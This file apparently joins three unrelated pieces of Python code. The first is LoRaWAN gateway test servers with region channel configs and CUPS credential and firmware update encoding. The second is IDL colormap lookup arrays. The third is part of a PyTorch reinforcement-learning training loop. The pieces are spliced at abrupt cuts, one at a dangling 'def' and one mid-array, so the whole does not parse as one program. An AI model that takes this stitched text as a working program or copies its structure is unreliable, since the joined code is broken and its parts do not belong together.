'chan_multiSF_4': {'enable': True, 'if': -237500, 'radio': 1},
'chan_multiSF_5': {'enable': True, 'if': 237500, 'radio': 1},
'chan_multiSF_6': {'enable': False},
'chan_multiSF_7': {'enable': False},
'radio_0': {'enable': True, 'freq': 868475000},
'radio_1': {'enable': True, 'freq': 869287500}}],
'upchannels': [[868100000, 0, 5],
[868300000, 0, 5],
[868500000, 0, 5],
[868850000, 0, 5],
[869050000, 0, 5],
[869525000, 0, 5]]
}
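# Annotation (added note, not part of the original config): each 'DRs' entry above is
# interpreted as (spreading factor, bandwidth in kHz, downlink-only flag), with -1
# padding for unused data rates, and each 'upchannels' entry as
# (frequency in Hz, min DR, max DR).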
router_config_KR920 = {
'DRs': [(12, 125, 0),
(11, 125, 0),
(10, 125, 0),
(9, 125, 0),
(8, 125, 0),
(7, 125, 0),
(-1, 0, 0),
(-1, 0, 0),
(-1, 0, 0),
(-1, 0, 0),
(-1, 0, 0),
(-1, 0, 0),
(-1, 0, 0),
(-1, 0, 0),
(-1, 0, 0),
(-1, 0, 0)],
'JoinEui': None,
'NetID': None,
'bcning': None,
'config': {},
'freq_range': [920900000, 923300000],
'hwspec': 'sx1301/1',
'max_eirp': 23.0,
'msgtype': 'router_config',
'protocol': 1,
'region': 'KR920',
'regionid': 8,
'sx1301_conf': [{'chan_FSK': {'enable': False},
'chan_Lora_std': {'enable': False},
'chan_multiSF_0': {'enable': True, 'if': -200000, 'radio': 0},
'chan_multiSF_1': {'enable': True, 'if': 0, 'radio': 0},
'chan_multiSF_2': {'enable': True, 'if': 200000, 'radio': 0},
'chan_multiSF_3': {'enable': False},
'chan_multiSF_4': {'enable': False},
'chan_multiSF_5': {'enable': False},
'chan_multiSF_6': {'enable': False},
'chan_multiSF_7': {'enable': False},
'radio_0': {'enable': True, 'freq': 922300000},
'radio_1': {'enable': False, 'freq': 0}}],
'upchannels': [(922100000, 0, 5),
(922300000, 0, 5),
(922500000, 0, 5)]
}
class ServerABC:
def __init__(self, port:int=6000, tlsidentity:Optional[str]=None, tls_no_ca=False):
self.server = None
self.ws = None
self.port = port
self.tls_no_ca = tls_no_ca
self.tlsctx = self.make_tlsctx(tlsidentity)
def make_tlsctx(self, tlsidentity:Optional[str]):
if tlsidentity is None:
return {}
tlsctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
tlsctx.load_verify_locations(tlsidentity+'.trust')
crtfile = tlsidentity+'.crt'
keyfile = tlsidentity+'.key'
tlsctx.load_cert_chain(crtfile, keyfile)
if not self.tls_no_ca:
tlsctx.verify_mode = ssl.CERT_REQUIRED
return { 'ssl':tlsctx }
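# Note: make_tlsctx() above returns either an empty dict or {'ssl': ctx}; start_server()
# below spreads it into websockets.serve(**self.tlsctx), so TLS is only enabled when a
# tlsidentity was supplied.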
async def start_server(self):
self.server = await websockets.serve(self.handle_ws, host='0.0.0.0', port=self.port, **self.tlsctx)
async def handle_ws(self, ws, path):
pass
class Infos(ServerABC):
def __init__(self, muxsuri='ws://localhost:6039/router', tlsidentity:Optional[str]=None, tls_no_ca=False):
super().__init__(port=6038, tlsidentity=tlsidentity, tls_no_ca=tls_no_ca)
print(" INFOS port %d" %(self.port))
self.muxsuri = muxsuri
async def handle_ws(self, ws, path):
print('. INFOS connect: %s from %r' % (path, ws.remote_address))
try:
while True:
msg = json.loads(await ws.recv())
print('> INFOS: %r' % msg);
r = msg['router']
resp = {
'router': r,
'muxs' : 'muxs-::0',
'uri' : self.muxsuri,
}
resp = self.router_info_response(resp)
await ws.send(json.dumps(resp))
print('< INFOS: %r' % resp);
except websockets.exceptions.ConnectionClosed as exc:
if exc.code != 1000:
logger.error('x INFOS close: code=%d reason=%r', exc.code, exc.reason)
except Exception as exc:
logger.error('x INFOS exception: %s', exc, exc_info=True)
try:
await ws.close()
except: pass
def router_info_response(self, resp):
return resp
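# Illustrative discovery exchange handled by Infos above (the router id is an example,
# not taken from a real station): the station asks for its LNS endpoint and gets back
# the muxs URI passed to __init__.
#   > {"router": "::1"}
#   < {"router": "::1", "muxs": "muxs-::0", "uri": "ws://localhost:6039/router"}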
class Muxs(ServerABC):
def __init__(self, tlsidentity:Optional[str]=None, tls_no_ca=False):
super().__init__(port=6039, tlsidentity=tlsidentity, tls_no_ca=tls_no_ca)
print(" MUXS port %d" %(self.port))
self.router_config = router_config_EU863_6ch
async def handle_ws(self, ws, path):
print('. MUXS connect: %s' % (path,))
if path != '/router':
await ws.close(1020)
rconf = self.get_router_config()
await ws.send(json.dumps(rconf))
print('< MUXS: router_config.')
await asyncio.sleep(0.1) # give station some time to setup radio/timesync
await self.handle_connection(ws)
def get_router_config(self):
return { **self.router_config, 'MuxTime': time.time() }
async def handle_binaryData(self, ws, data:bytes) -> None:
pass
async def handle_connection(self, ws):
try:
while True:
msgtxt = await ws.recv()
#print('MUXS raw recv: %r' % (msgtxt,))
if isinstance(msgtxt, bytes):
await self.handle_binaryData(ws, msgtxt)
continue
msg = json.loads(msgtxt)
print('> MUXS: %r' % (msg,))
msgtype = msg.get('msgtype')
if msgtype:
fn = getattr(self, 'handle_'+msgtype, None)
if fn:
await fn(ws, msg)
continue
print(' MUXS: ignored msgtype: %s\n%r' % (msgtype, msg))
except (asyncio.CancelledError, SystemExit):
raise
except websockets.exceptions.ConnectionClosed as exc:
if exc.code != 1000:
logger.error('x MUXS close: code=%d reason=%r', exc.code, exc.reason)
except Exception as exc:
logger.error('x MUXS exception: %s', exc, exc_info=True)
try:
await ws.close()
except: pass
async def handle_version(self, ws, msg):
print('> MUXS: Station Version: %r' % (msg,))
class Cups(ServerABC):
def __init__(self, tlsidentity:Optional[str]=None, tls_no_ca=False):
super().__init__(port=6040, tlsidentity=tlsidentity, tls_no_ca=tls_no_ca)
self.app = web.Application()
print(" CUPS port %d" %(self.port))
for args in [ ('POST', '/update-info', self.handle_update_info), ]:
self.app.router.add_route(*args)
async def start_server(self):
handler = self.app.make_handler()
self.server = await self.app.loop.create_server(handler, host='0.0.0.0', port=self.port, **self.tlsctx)
LEND=b'\\s*\r?\n'
PEM_REX = re.compile(b'-+BEGIN (?P<key>[^-]+)-+' + LEND +
b'(([0-9A-Za-z+/= ]+' + LEND + b')+)' +
b'-+END (?P=key)-+' + LEND)
# Since router and CUPS compare CRCs it is crucial that the input to the CRC process
# is exactly the same. Therefore, normalize according to the rules below.
#
# E.g. this makes the comparison resilient against pasting or editing one of the files
# and thereby introducing whitespace changes that would alter the CRC.
def normalizePEM(self, data:bytes, fmt="PEM") -> List[bytes]:
norm = []
for pem in Cups.PEM_REX.finditer(data):
if fmt == "DER":
out = base64.b64decode(re.sub(Cups.LEND, b'\n', pem.group(2)))
#out += b'\x00' * (4-len(out)&3)
else:
out = re.sub(Cups.LEND, b'\n', pem.group(0))
norm.append(out)
return norm
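# Example (illustrative, assuming a Cups instance `cups`): two copies of the same PEM
# block that differ only in line endings normalize to identical bytes, so the CRCs
# computed over them match.
#   pem_a = b'-----BEGIN CERTIFICATE-----\r\nAAAA\r\n-----END CERTIFICATE-----\r\n'
#   pem_b = b'-----BEGIN CERTIFICATE-----\nAAAA\n-----END CERTIFICATE-----\n'
#   assert cups.normalizePEM(pem_a) == cups.normalizePEM(pem_b)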
def rdPEM(self, fn, fmt="PEM"):
if not os.path.exists(fn):
return b''
with open(fn,'rb') as f:
return self.normalizePEM(f.read(), fmt)[0]
def normalizeId (self, id:Any) -> str:
# For tests use a shorter representation
# For production use str(Id6(id))
return str(Id6(id).id)
def readCupsCred(self, routerid, fmt="PEM"):
return (self.rdPEM('cups.ca', fmt) +
self.rdPEM('cups-router-%s.crt' % routerid, fmt) +
self.rdPEM('cups-router-%s.key' % routerid, fmt))
def readTcCred(self, routerid, fmt="PEM"):
return (self.rdPEM('tc.ca', fmt) +
self.rdPEM('tc-router-%s.crt' % routerid, fmt) +
self.rdPEM('tc-router-%s.key' % routerid, fmt))
def readRouterConfig(self, id:str) -> Dict[str,Any]:
with open('cups-router-%s.cfg' % id) as f:
d = json.loads(f.read())
version = d['version']
with open(version+'.bin', 'rb') as f:
fwBin = f.read()
d['fwBin'] = fwBin
try:
d['fwSig'] = []
for sigkey in glob.iglob('sig*.key', recursive=True):
try:
with open(sigkey,'rb') as f:
key = f.read()
crc = crc32(key)
print('Key: %08X %s ' % (crc, sigkey))
sigf = version+'.bin.'+sigkey[:-4]
print(sigf)
with open(sigf, 'rb') as f:
fwSig = f.read()
print(len(fwSig))
d['fwSig'].append((crc,fwSig))
except Exception as ex:
print("Failed to process sign key %s" % sigkey)
print(ex)
except:
d['fwSig'] = [(b'', b'\x00'*4)]
d['cupsCred'] = self.readCupsCred(id, d.get("credfmt", "DER"))
d['tcCred'] = self.readTcCred(id, d.get("credfmt", "DER"))
d['cupsCredCrc'] = crc32(d['cupsCred']) & 0xFFFFFFFF
d['tcCredCrc'] = crc32(d['tcCred']) & 0xFFFFFFFF
return d
def encodeUri(self, key:str, req:Dict[str,Any], cfg:Dict[str,Any]) -> bytes:
k = key+'Uri'
if req[k] == cfg[k]:
return b'\x00'
s = cfg[k].encode('ascii')
return struct.pack('<B', len(s)) + s
def encodeCred(self, key:str, req:Dict[str,Any], cfg:Dict[str,Any]) -> bytes:
k = key+'CredCrc'
if req[k] == cfg[k]:
return b'\x00\x00'
d = cfg[key+'Cred']
return struct.pack('<H', len(d)) + d
def encodeFw(self, req:Dict[str,Any], cfg:Dict[str,Any]) -> bytes:
if req['version'] == cfg['version']:
return b'\x00\x00\x00\x00'
fwbin = cfg['fwBin']
return struct.pack('<I', len(fwbin)) + fwbin
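# Sketch (assumption about how the encode* helpers above are combined; the method that
# does so is not shown here): a CUPS update-info response body would concatenate the
# length-prefixed sections roughly as
#   body = (self.encodeUri('cups', req, cfg) + self.encodeUri('tc', req, cfg) +
#           self.encodeCred('cups', req, cfg) + self.encodeCred('tc', req, cfg) +
#           <signature section> + self.encodeFw(req, cfg))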
def
0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.3281250, 0.3281250, 0.3281250, 0.3281250, 0.3281250, 0.3281250,
0.3281250, 0.3281250, 0.3281250, 0.3281250, 0.3281250, 0.3281250,
0.3281250, 0.3281250, 0.3281250, 0.3281250, 0.6562500, 0.6562500,
0.6562500, 0.6562500, 0.6562500, 0.6562500, 0.6562500, 0.6562500,
0.6562500, 0.6562500, 0.6562500, 0.6562500, 0.6562500, 0.6562500,
0.6562500, 0.6562500, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.8593750, 0.8593750, 0.8593750, 0.8593750,
0.8593750, 0.8593750, 0.8593750, 0.8593750, 0.8593750, 0.8593750,
0.8593750, 0.8593750, 0.8593750, 0.8593750, 0.8593750, 0.8593750,
0.7031250, 0.7031250, 0.7031250, 0.7031250, 0.7031250, 0.7031250,
0.7031250, 0.7031250, 0.7031250, 0.7031250, 0.7031250, 0.7031250,
0.7031250, 0.7031250, 0.7031250, 0.7031250, 0.5000000, 0.5000000,
0.5000000, 0.5000000, 0.5000000, 0.5000000, 0.5000000, 0.5000000,
0.5000000, 0.5000000, 0.5000000, 0.5000000, 0.5000000, 0.5000000,
0.5000000, 0.5000000, 0.2500000, 0.2500000, 0.2500000, 0.2500000,
0.2500000, 0.2500000, 0.2500000, 0.2500000, 0.2500000, 0.2500000,
0.2500000, 0.2500000, 0.2500000, 0.2500000, 0.2500000, 0.2500000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.7421875, 0.7421875,
0.7421875, 0.7421875, 0.7421875, 0.7421875, 0.7421875, 0.7421875,
0.7421875, 0.7421875, 0.7421875, 0.7421875, 0.7421875, 0.7421875,
0.7421875, 0.7421875, 0.8593750, 0.8593750, 0.8593750, 0.8593750,
0.8593750, 0.8593750, 0.8593750, 0.8593750, 0.8593750, 0.8593750,
0.8593750, 0.8593750, 0.8593750, 0.8593750, 0.8593750, 0.8593750,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938]),
array([ 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0]),
)
### IDL colormap 13 :: RAINBOW ###
color_map_luts['idl13'] = \
(
array([ 0.0000000, 0.0156250, 0.0351562, 0.0507812, 0.0703125, 0.0859375,
0.1054688, 0.1210938, 0.1406250, 0.1562500, 0.1757812, 0.1953125,
0.2109375, 0.2265625, 0.2382812, 0.2500000, 0.2656250, 0.2695312,
0.2812500, 0.2890625, 0.3007812, 0.3085938, 0.3125000, 0.3203125,
0.3242188, 0.3320312, 0.3281250, 0.3359375, 0.3398438, 0.3437500,
0.3359375, 0.3398438, 0.3398438, 0.3398438, 0.3320312, 0.3281250,
0.3281250, 0.3281250, 0.3242188, 0.3085938, 0.3046875, 0.3007812,
0.2968750, 0.2773438, 0.2734375, 0.2656250, 0.2578125, 0.2343750,
0.2265625, 0.2148438, 0.2070312, 0.1796875, 0.1679688, 0.1562500,
0.1406250, 0.1289062, 0.0976562, 0.0820312, 0.0625000, 0.0468750,
0.0156250, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0156250, 0.0312500, 0.0468750,
0.0820312, 0.0976562, 0.1132812, 0.1289062, 0.1640625, 0.1796875,
0.1992188, 0.2148438, 0.2460938, 0.2617188, 0.2812500, 0.2968750,
0.3125000, 0.3476562, 0.3632812, 0.3789062, 0.3945312, 0.4296875,
0.4453125, 0.4648438, 0.4804688, 0.5117188, 0.5273438, 0.5468750,
0.5625000, 0.5976562, 0.6132812, 0.6289062, 0.6445312, 0.6601562,
0.6953125, 0.7109375, 0.7304688, 0.7460938, 0.7773438, 0.7929688,
0.8125000, 0.8281250, 0.8632812, 0.8789062, 0.8945312, 0.9101562,
0.9453125, 0.9609375, 0.9765625, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938]),
array([ 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0156250, 0.0312500, 0.0625000, 0.0820312,
0.0976562, 0.1132812, 0.1484375, 0.1640625, 0.1796875, 0.1992188,
0.2148438, 0.2460938, 0.2617188, 0.2812500, 0.2968750, 0.3281250,
0.3476562, 0.3632812, 0.3789062, 0.4140625, 0.4296875, 0.4453125,
0.4648438, 0.4960938, 0.5117188, 0.5273438, 0.5468750, 0.5625000,
0.5937500, 0.6132812, 0.6289062, 0.6445312, 0.6796875, 0.6953125,
0.7109375, 0.7304688, 0.7617188, 0.7773438, 0.7929688, 0.8125000,
0.8437500, 0.8593750, 0.8789062, 0.8945312, 0.9101562, 0.9453125,
0.9609375, 0.9765625, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9765625, 0.9453125,
0.9296875, 0.9101562, 0.8945312, 0.8632812, 0.8437500, 0.8281250,
0.8125000, 0.7773438, 0.7617188, 0.7460938, 0.7304688, 0.6953125,
0.6796875, 0.6640625, 0.6445312, 0.6289062, 0.5976562, 0.5781250,
0.5625000, 0.5468750, 0.5117188, 0.4960938, 0.4804688, 0.4648438,
0.4296875, 0.4140625, 0.3984375, 0.3789062, 0.3476562, 0.3320312,
0.3125000, 0.2968750, 0.2812500, 0.2460938, 0.2304688, 0.2148438,
0.1992188, 0.1640625, 0.1484375, 0.1328125, 0.1132812, 0.0820312,
0.0664062, 0.0468750, 0.0312500, 0.0000000]),
array([ 0.0000000, 0.0117188, 0.0273438, 0.0390625, 0.0546875, 0.0742188,
0.0898438, 0.1093750, 0.1250000, 0.1484375, 0.1679688, 0.1875000,
0.2070312, 0.2304688, 0.2460938, 0.2656250, 0.2812500, 0.3007812,
0.3164062, 0.3359375, 0.3554688, 0.3710938, 0.3906250, 0.4062500,
0.4257812, 0.4414062, 0.4609375, 0.4765625, 0.4960938, 0.5156250,
0.5312500, 0.5507812, 0.5664062, 0.5859375, 0.6015625, 0.6210938,
0.6367188, 0.6562500, 0.6757812, 0.6914062, 0.7109375, 0.7265625,
0.7460938, 0.7617188, 0.7812500, 0.7968750, 0.8164062, 0.8359375,
0.8515625, 0.8710938, 0.8867188, 0.9062500, 0.9218750, 0.9414062,
0.9570312, 0.9765625, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9609375, 0.9453125, 0.9296875,
0.9101562, 0.8789062, 0.8593750, 0.8437500, 0.8281250, 0.7929688,
0.7773438, 0.7617188, 0.7460938, 0.7304688, 0.6953125, 0.6796875,
0.6640625, 0.6445312, 0.6132812, 0.5937500, 0.5781250, 0.5625000,
0.5273438, 0.5117188, 0.4960938, 0.4804688, 0.4453125, 0.4296875,
0.4140625, 0.3984375, 0.3789062, 0.3476562, 0.3281250, 0.3125000,
0.2968750, 0.2617188, 0.2460938, 0.2304688, 0.2148438, 0.1796875,
0.1640625, 0.1484375, 0.1328125, 0.0976562, 0.0820312, 0.0625000,
0.0468750, 0.0312500, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000]),
array([ 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0,
1:
one_hot.append(target_img)
if rank > 5:
Reward = 0.
R_back = 0.
else:
Reward = 1.
R_back = 1.
# elif epoch <= 20:
# if rank > 15:
# Reward = 0.
# R_back = 0.
# else:
# Reward = 1.
# R_back = 1.
# if epoch <= 100:
# if rank > 10:
# Reward = 0.
# R_back = 0.
# else:
# Reward = 1.
# R_back = 1.
# else:
# if rank > 5:
# Reward = 0.
# R_back = 0.
# else:
# Reward = 1.
# R_back = 1.
# if rank > 5:
# Reward = 0.
# R_back = 0.
# else:
# Reward = 1.
# R_back = 1.
R.append(torch.tensor([Reward]))
Reward_back.append(torch.tensor([R_back]))
# R = torch.tensor(R)
# Reward_back = torch.tensor(Reward_back)
# R_list.append(R)
# Reward_back_list.append(Reward_back)
# RL_loss = RL_loss / len(sketch_name_list)
R = torch.stack(R)
Reward_back = torch.stack(Reward_back)
# R = torch.stack(R_list).transpose(1,0).to(self.device)
# Reward_back = torch.stack(Reward_back_list).transpose(1, 0).to(self.device)
one_hot = torch.cat(one_hot)
assert one_hot[-1].sum() == target_img.sum()
# loss_action_back = torch.mean(F.mse_loss(action, one_hot, reduction='none'), dim=1)
# print("loss_action_back", loss_action_back)
# calculate reward
# predicted = torch.max(log_probas, 1)[1]
# R = (predicted.detach() == y).float()
# if (epoch < 100):
# R = ((1.0 / loss_action_back.detach()) > 70).float()
# elif (epoch < 200):
# R = ((1.0 / loss_action_back.detach()) > 75).float()
# else:
# R = ((1.0 / loss_action_back.detach()) > 80).float()
# print('R', R)
R = R.repeat(1, self.num_glimpses).to(self.device)
loss_action = F.mse_loss(action, one_hot)
# print('loss_action', loss_action)
# loss_baseline = F.mse_loss(baselines, R)
# print("loss_base",loss_baseline)
# print("base", baselines)
# loss_entropy = -torch.mean(entropys)
# compute reinforce loss
# summed over time steps and averaged across batch
adjusted_reward = R
loss_reinforce = torch.sum(-log_pi * adjusted_reward, dim=1)
loss_reinforce = torch.mean(loss_reinforce, dim=0)
# sum up into a hybrid loss
# if epoch <= 30:
# loss = loss_action + 0.01 * loss_reinforce + 0.01 * loss_entropy
# else:
loss = 0.01 * loss_reinforce + loss_action
# elif epoch <= 100:
# loss = loss_action + 0.01 * loss_reinforce + 0.1 * loss_entropy
# elif epoch <= 200:
# loss = loss_action + 0.01 * loss_reinforce + 0.05 * loss_entropy
# elif epoch <= 500:
# loss = loss_action + 0.01 * loss_reinforce + 0.01 * loss_entropy
# else:
# loss = loss_action + 0.01 * loss_reinforce
loss_buffer.append(loss)
# acc = adjusted_reward.squeeze().mean()
# R = R.squeeze().mean()
Reward_back = Reward_back.squeeze().mean()
# store
# print('h_t', h_t)
# print('h_t_norm', torch.norm(h_t))
losses.update(loss.item(), x.size()[0])
losses_action.update(loss_action.item(), x.size()[0])
losses_reinforce.update(loss_reinforce.item(), x.size()[0])
# losses_baseline.update(loss_baseline.item(), x.size()[0])
# accs.update(acc.item(), x.size()[0])
reward.update(Reward_back, x.size()[0])
# compute gradients and update SGD
policy_loss = torch.stack(loss_buffer).mean()
policy_loss.backward()
# utils.clip_grad_norm_(self.model.classifier.parameters(), 40)
